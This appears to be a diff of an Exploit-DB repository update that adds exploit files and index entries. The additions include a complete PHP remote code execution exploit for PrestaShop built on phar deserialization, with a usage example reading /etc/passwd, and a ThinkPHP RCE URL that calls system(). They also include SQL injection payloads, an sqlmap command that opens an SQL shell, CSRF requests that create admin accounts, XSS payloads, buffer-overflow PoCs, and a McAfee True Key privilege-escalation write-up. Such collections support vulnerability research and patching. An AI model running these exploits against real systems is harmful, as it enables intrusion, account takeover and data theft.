# http://localhost/[PATH]/index.php?q=advancesearch POST / SEARCH=[SQL]&batch=[SQL]&COURSE=[SQL]&STATUS=[SQL]&submit=
#
#SQL Injection
GET /[PATH]/index.php?q=blog&id=-201800056%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%4e%52%3a%3d%30%29%2c%28%53%45%4c%45%43%54%28%30%29%46%52%4f%4d%28%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%29%57%48%45%52%45(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=%43%4f%4e%43%41%54(@x,%4c%50%41%44(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))%29%29%78%29%2c%34%2c%35%2c%36%2c%37%2c%38%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=hasj51emnq9caak0pf8h8htmm6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 05 Dec 2018 19:20:56 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
#Cross-Site Request Forgery (Update Admin)
POST /[PATH]/admin/modules/user/controller.php?action=edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
user_id=312316&deptid=&user_name=administrator&deptid=&user_email=admin&deptid=&user_pass=efeefe&deptid=&retype_user_pass=efeefe&save=: undefined
HTTP/1.1 200 OK
Date: Wed, 05 Dec 2018 19:29:44 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#Cross-Site Request Forgery (Add Admin)
POST /[PATH]/admin/modules/user/controller.php?action=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
deptid=&user_name=efe&deptid=&user_email=efe&deptid=&user_pass=efeefe&deptid=&retype_user_pass=efeefe&save=: undefined
HTTP/1.1 200 OK
Date: Wed, 05 Dec 2018 19:33:34 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

225
exploits/php/webapps/45964.php Normal file
View file

@ -0,0 +1,225 @@
<?php
/**
*
* PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution
* See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.
*
* Chaining multiple vulnerabilities to trigger deserialization via phar.
*
* Date:
* December 1st, 2018
*
* Author:
* farisv
*
* Vendor Homepage:
* https://www.prestashop.com/
*
* Vulnerable Package Link:
* https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip
*
* CVE :
* - CVE-2018-19126
* - CVE-2018-19125
*
* Prerequisite:
* - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.
* - Back Office account (logistician, translator, salesman, etc.).
*
* Usage:
* php exploit.php back-office-url email password func param
*
* Example:
* php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123
* system 'cat /etc/passwd'
*
* Note:
* Note that the upload directory will be renamed and you can't upload the
* malicious phar file again if the folder name is not reverted. You might want
* to execute reverse shell to gain persistence RCE or include the command to
* rename the folder again in your payload (you need to know the path to the
* upload directory).
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/
namespace PrestaShopRCE {
class Exploit {
private $url;
private $email;
private $passwd;
private $cmd;
private $func;
private $param;
public function __construct($url, $email, $passwd, $func, $param) {
$this->url = $url;
$this->email = $email;
$this->passwd = $passwd;
$this->func = $func;
$this->param = $param;
}
private function post($path, $data, $cookie) {
$curl_handle = curl_init();
$options = array(
CURLOPT_URL => $this->url . $path,
CURLOPT_HEADER => true,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIE => $cookie
);
curl_setopt_array($curl_handle, $options);
$raw = curl_exec($curl_handle);
curl_close($curl_handle);
return $raw;
}
private function fetch_cookie($raw) {
$header = "Set-Cookie: ";
$cookie_header_start = strpos($raw, $header);
$sliced_part = substr($raw, $cookie_header_start + strlen($header));
$cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));
return $cookie;
}
public function run() {
// Login and get PrestaShop cookie
$data = array(
'email' => $this->email,
'passwd' => $this->passwd,
'submitLogin' => '1',
'controller' => 'AdminLogin',
'ajax' => '1'
);
$cookie = "";
$raw = $this->post('/', $data, $cookie);
$prestashop_cookie = $this->fetch_cookie($raw);
// Get FileManager cookie
$data = array();
$cookie = $prestashop_cookie;
$raw = $this->post('/filemanager/dialog.php', $data, $cookie);
$filemanager_cookie = $this->fetch_cookie($raw);
// Craft deserialization gadget
$gadget = new \Monolog\Handler\SyslogUdpHandler(
new \Monolog\Handler\BufferHandler(
['current', $this->func],
[$this->param, 'level' => null]
)
);
// Craft malicious phar file
$phar = new \Phar('phar.phar');
$phar->startBuffering();
$phar->addFromString('test', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($gadget);
$phar->stopBuffering();
// Change the extension
rename('phar.phar', 'phar.pdf');
// Cookie for next requests
$cookie = "$prestashop_cookie; $filemanager_cookie";
// Upload phar.pdf
$curl_file = new \CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');
$data = array(
'file' => $curl_file
);
$raw = $this->post('/filemanager/upload.php', $data, $cookie);
// Rename image directory to bypass realpath() check
$data = array(
'name' => 'renamed'
);
$raw = $this->post(
'/filemanager/execute.php?action=rename_folder',
$data,
$cookie
);
// Trigger deserialization
// The '/img/cms/' substring is important to bypass string check
$data = array(
'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'
);
$raw = $this->post(
'/filemanager/ajax_calls.php?action=image_size',
$data,
$cookie
);
// Display the raw result
print $raw;
}
}
}
/*
* Based on
* https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/
*/
namespace Monolog\Handler {
class SyslogUdpHandler {
protected $socket;
function __construct($param) {
$this->socket = $param;
}
}
class BufferHandler {
protected $handler;
protected $bufferSize = -1;
protected $buffer;
protected $level = null;
protected $initialized = true;
protected $bufferLimit = -1;
protected $processors;
function __construct($methods, $command) {
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = clone $this;
}
}
}
namespace {
if (count($argv) != 6) {
$hint = "Usage:\n php $argv[0] back-office-url email password func param\n\n";
$hint .= "Example:\n php $argv[0] http://127.0.0.1/admin-dev/ ";
$hint .= "salesman@shop.com 54l35m4n123 system 'uname -a'";
die($hint);
}
if (!extension_loaded('curl')) {
die('Need php-curl');
}
$url = $argv[1];
$email = $argv[2];
$passwd = $argv[3];
$func = $argv[4];
$param = $argv[5];
$exploit = new PrestaShopRCE\Exploit($url, $email, $passwd, $func, $param);
$exploit->run();
}

15
exploits/php/webapps/45967.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19913
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application versions from v4.09.03 to v4.11.01
After logging into the Domainmod application panel, browse to the /assets/add/registrar-accounts.php page and inject a javascript XSS
payload in UserName, Reseller ID & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/86

45
exploits/php/webapps/45974.txt Normal file
View file

@ -0,0 +1,45 @@
Disclaimer:
[This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
Attack type : Remote
Patch Status : Unpatched
Exploitation :
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# Twitter : http://twitter.com/emuess
# Original Advisory DATE: [29/01/2014]
# Publishing of Exploit Date : [17/02/2014]
Description
===========
It is possible to inject malicious HTML Elements into the email and
cause a Cross site Scripting (XSS) payload to be executed.
Tested ICEWARP Client Versions (http://www.icewarp.com/)
============================
Version : 11.0.0.0 (2014-01-25) x64
& 10.3.4
Browser Used
=============
Mozilla Firefox 26.0
Proof Of Concept
============
Please find the details about the exploit : http://xc0re.net/blog/?p=363
Proof Of Concept
=================
For Version: ICEWARP 11.0.0
><object data=”data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+”></object>>
><EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>>
Note:
For Version: ICEWARP 10.3.4
<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>

20
exploits/php/webapps/45976.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: SQL Injection in HotelDruid version 2.3
# Google Dork: N/A
# Date: 9-12-2018
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://www.hoteldruid.com
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: 2.3 (REQUIRED)
# Tested on: Windows x64/ Kali linux x64
# CVE : N/A
Description:
Hoteldruid is an open source program for hotel management (property
management software) developed by DigitalDruid.Net
Vulnerability Description:
the "id_utente_mod" parameter is Vulnerable to SQL Injection Vulnerability.
Payload:
1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT
(ELT(5=5,1)))))-- -
Poc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20-

23
exploits/php/webapps/45977.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: WP AutoSuggest 0.24 - SQL Injection
# Date: 01-12-2018
# Software Link: https://wordpress.org/plugins/wp-autosuggest/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 0.24
# Category: webapps
SQL Injection
File: autosuggest.php
Vulnerable code:
if (isset($_GET['wpas_keys'])) {
$wpas_keys = $_GET['wpas_keys'];
}
...
$wpas_keys = str_replace(' ','%',$wpas_keys);
$pageposts = $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE (post_title LIKE '%$wpas_keys%') AND post_status = 'publish' ORDER BY post_date DESC");
Exploitation example:
sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

11
exploits/php/webapps/45978.txt Normal file
View file

@ -0,0 +1,11 @@
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A
# Exploit
http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

22
exploits/windows/dos/45966.py Executable file
View file

@ -0,0 +1,22 @@
# -*- coding: utf-8 -*-
# Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service (PoC)
# Date: 06/12/2018
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/get/SFTPMSI64.exe
# Version: 9.0.2623.0
# Tested on: Windows Server 2016 (x64)/ Windows 10 Single Language x64
# Steps to Produce the Crash:
# 1.- Run python code : python SmartFTPClient.py
# 2.- Open SmartFTPClient.txt and copy content to clipboard
# 3.- Open SmartFTP Client
# 4.- New connection
# 5.- Paste ClipBoard on Host
# 6.- Crashed
buffer = "\x41" * 256
f = open ("SmartFTPClient.txt", "w")
f.write(buffer)
f.close()

27
exploits/windows/dos/45968.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: LanSpy 2.0.1.159 - Local BoF (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-12-07
# Homepage: https://lizardsystems.com
# Software Link: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Version: 2.0.1.159
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window paste the content of
# "exploit.txt" into the scan field. Click the start button.
#!/usr/bin/python
buffer = "A" * 688
eip = "B" * 4
payload = buffer + eip
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

75
exploits/windows/local/45961.txt Normal file
View file

@ -0,0 +1,75 @@
McAfee True Key: Multiple Issues with McAfee.TrueKey.Service Implementation
Platform: Version 5.1.173.1 on Windows 10 1809.
Class: Elevation of Privilege
Summary:
There are multiple issues in the implementation of the McAfee.TrueKey.Service which can result in privilege escalation through executing arbitrary processes or deleting files and directories.
Description:
I discovered the main True Key service had a pre-existing vulnerability due to the Exodus Intelligence blog post (https://blog.exodusintel.com/2018/09/10/truekey-the-not-so-uncommon-story-of-a-failed-patch/) which just discussed a DLL planting attack that had tried to be fixed once (CVE-2018-6661), but unsuccessfully. So I decided to look into service itself and especially the SecureExecute command. There are multiple issues here, which Im not sure youll address. Im only going to provide a PoC for one of them (perhaps the most serious) but you should consider fixing all of them. Starting with the most serious and working back:
1. The target file to execute in SecureExecuteCommand::Execute is checked that it has the same Authenticode certificate as the calling service binary. This should ensure that only executables signed by McAfee would validate. However you dont actually verify the signature is valid, you only call McAfee.YAP.Security.SecurityCertificate.WinTrust::CheckCertificates which gets the certificate from the binary using X509Certificate.CreateFromSignedFile. The CreateFromSignedFile method DOES NOT verify that the signature is correct, it only extracts the X509Certificate from the security data directory. What this means is you can take the security data directory from a vaild signed file, and apply it to an arbitrary file and itll pass the verification checks. This allows you to execute any binary you like. There is a VerifyEmbeddedSignature method, but you dont actually call it. This is what Ive sent as a POC.
2. There are multiple Time-of-Check Time-of-Use (TOCTOU) in the SecureExecuteCommand::Execute method with the filename. Let me annotate snippets of code (from ILSPY decompiler).
FileInfo fileInfo = new FileInfo(_filename);
if (!fileInfo.Exists) <<< File use 1
...
FileSecurity accessControl = fileInfo.GetAccessControl(); <<< File use 2
...
fileInfo.SetAccessControl(accessControl); <<< File use 3
...
if (!winTrust.CheckCertificates(_filename)) <<< File use 4
FileVersionInfo versionInfo = FileVersionInfo.GetVersionInfo(_filename); <<< File use 5
...
Process process = Process.Start(fileInfo.ToString(), _flags); <<< File use 6
...
File.Delete(_filename); <<< File use 7
At each of these points the file is opened, some operation is performed, then the file is closed again. The simplest way this could be achieved would be using mount point symbolic links to redirect the filename to different locations. For example at point 4 the certificate of the file is checked, but at 7 the path is executed By using a mount point, which acts as a directory symlink we could do the following:
1. Create a directory mount point using “mklink /D c:\somedir c:\a”.
2. Create c:\a and copy in a McAfee signed file to c:\a\file.exe.
3. Call the SecureExecute RPC passing the path c:\somedir\file.exe.
4. At point 4 the code will open c:\somedir\file.exe to verify the certificate. This redirects to c:\a\file.exe which is a valid signed file.
5. Between 4 and 7 the mount point can be changed to point instead to c:\b. At c:\b\file.exe is an arbitrary binary.
6. Once 7 is reached the code will execute c:\somedir\file.exe which now results in executing c:\b\file.exe which is a completely different file and not the one which was verified.
The changing of the security descriptor at 3 is presumably supposed to prevent someone modifying the file in that time window, but of course it doesnt take into account just changing the path underneath the code using symlinks. Also its possible for a process to maintain a handle with WRITE_DAC access before the code modifies the security descriptor which would allow the attacker to change it back again and rewrite the file even without abusing symlinks. This would how youd exploit it from a sandbox environment.
In reality all of these issues (including DLL planting) could be fixed by moving the executable to run to a secure location first which only SYSTEM has access to then doing correct verification before execution.
Another issue which copying might not fix is at 7, youre deleting an arbitrary path as the SYSTEM user. Again an attacker could replace this with a symbolic link and get you to delete any file on the disk as a privileged user.
3. When you call McAfee.YAP.Service.Common.ClientRegister::RegisterClient you look up the PID associated with a TCP port number passed in from the client. The calling process supplies this port, when in reality you should probably extract it from the TCP server. At the moment you can pass 30000 from the client, which is what the service is listening on and it ends up verifying itself. Ive no idea if this was the intention? The PoC abuses this to setup the RPC connection.
Also in the McAfee.YAP.Security.ClientVerifier::GetProcessPath method you using Process::MainModule::FileName to extract the calling process path to verify. This path is actually extracted from the memory of the target process itself (i.e. under attacker control) and so can be trivially spoofed. So dont do that.
4. The CleanupCommand deletes values from the the shared location C:\ProgramData\McAfee\TrueKey which any user can manipulate. Again itd be possible to abuse this command as you dont secure the directory as shown by running icacls.
C:\ProgramData>icacls McAfee
McAfee NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
You could replace parts of this directory structure which symlinks and get the system service to delete arbitrary files or directories under attacker control. It might be okay to ensure these directories are created with permissions which a user cant modify but thats a difficult thing to get correct.
Proof of Concept:
Ive provided a PoC as a C# project. This exploits issue 1 . In order to compile youll need to take the files from the c:\program files\mcafee\truekey directory for version 5.1.173.1 and copy them into the SecureExecutePoc directory.
1) Compile the C# project. If it cant find certain TrueKey files you havent copied the right ones.
2) Execute the created SecureExecutePoc.exe file.
Expected Result:
Calling SecureExecute with an untrusted binary fails.
Observed Result:
An arbitrary binary with the name tmpXXX.tmp.exe is executing as SYSTEM.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45961.zip

21
files_exploits.csv
View file

@ -6208,6 +6208,8 @@ id,file,description,date,author,type,platform,port
45950,exploits/multiple/dos/45950.txt,"Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption",2018-12-04,"Google Security Research",dos,multiple,
45951,exploits/multiple/dos/45951.txt,"Wireshark - 'find_signature' Heap Out-of-Bounds Read",2018-12-04,"Google Security Research",dos,multiple,
45956,exploits/windows_x86/dos/45956.py,"Textpad 8.1.2 - Denial Of Service (PoC)",2018-12-09,"Gionathan Reale",dos,windows_x86,
45966,exploits/windows/dos/45966.py,"SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)",2018-12-11,"Alejandra Sánchez",dos,windows,
45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10138,6 +10140,8 @@ id,file,description,date,author,type,platform,port
45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd,
45938,exploits/aix/local/45938.pl,"Xorg X11 Server (AIX) - Local Privilege Escalation",2018-12-04,0xdono,local,aix,
45953,exploits/unix/local/45953.rb,"Emacs - movemail Privilege Escalation (Metasploit)",2018-12-04,Metasploit,local,unix,
45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40424,7 +40428,7 @@ id,file,description,date,author,type,platform,port
45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,80
45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php,80
45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - 'raid' Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,
45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
@ -40445,6 +40449,7 @@ id,file,description,date,author,type,platform,port
45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
45944,exploits/php/webapps/45944.txt,"KeyBase Botnet 1.5 - SQL Injection",2018-12-04,n4pst3r,webapps,php,
@ -40458,3 +40463,17 @@ id,file,description,date,author,type,platform,port
45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php,
45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80
45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,80
45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php,
45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php,
45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php,
45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,
45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware,
45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware,
45972,exploits/hardware/webapps/45972.txt,"ZTE ZXHN H168N - Improper Access Restrictions",2018-12-11,"Usman Saeed",webapps,hardware,
45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx,
45974,exploits/php/webapps/45974.txt,"IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting",2014-02-17,"Usman Saeed",webapps,php,
45975,exploits/multiple/webapps/45975.txt,"Apache OFBiz 16.11.05 - Cross-Site Scripting",2018-12-11,DKM,webapps,multiple,
45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php,
45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,
45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -925,3 +925,4 @@ id,file,description,date,author,type,platform
45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
